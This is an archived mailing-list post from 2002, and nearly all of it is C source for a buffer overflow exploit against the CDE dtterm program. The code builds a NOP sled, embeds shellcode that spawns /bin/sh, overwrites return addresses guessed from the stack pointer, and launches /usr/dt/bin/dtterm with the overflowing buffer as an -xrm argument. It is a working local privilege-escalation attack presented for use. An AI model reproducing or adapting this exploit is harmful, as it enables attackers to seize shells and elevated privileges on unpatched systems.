('binary' encoding is not supported, stored as-is) Here is code.../* * dtterm buffer overflow by jGgM * http://www.netemperor.com/en/ * EMail: jggmat_private * */ #include <stdio.h> #include <stdlib.h> char shell[] = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0 \x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50 \xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2 \xff\xff\xff" "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53 \x8d\x1e\x89\x5e\x08\x53" "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8 \xbb\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68 \xff\xff\xff\xff\xff\xff\xff\xff\xff"; #define NOP 0x90 #define LEN 102 #define BUFFER_SIZE 1052 #define RET_LENGTH 10 #define ADJUST 4 long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1]; long offset, ret; int x, y; if(argc > 2) { fprintf(stderr, "Usage: %s [offset]\n", argv[0]); exit(1); } // end of if.. if(argc == 2) offset = atol(argv[1]); else offset = 0; ret = get_sp() + 900 + offset; for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP; x = BUFFER_SIZE - strlen(shell) - ADJUST; for(y=0; y<strlen(shell); y++) buffer[x++] = shell[y]; for(y=0; y<RET_LENGTH; y++, x += 4) *((int *)&buffer[x]) = ret; buffer[x] = 0x00; printf("ret = 0x%x,\n", ret); printf("offset = %d\n", offset); printf("buffer size = %d\n", strlen(buffer)); execl("/usr/dt/bin/dtterm", "dtterm", "-xrm", buffer, NULL); printf("exec failed\n"); }
This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 14:17:16 PST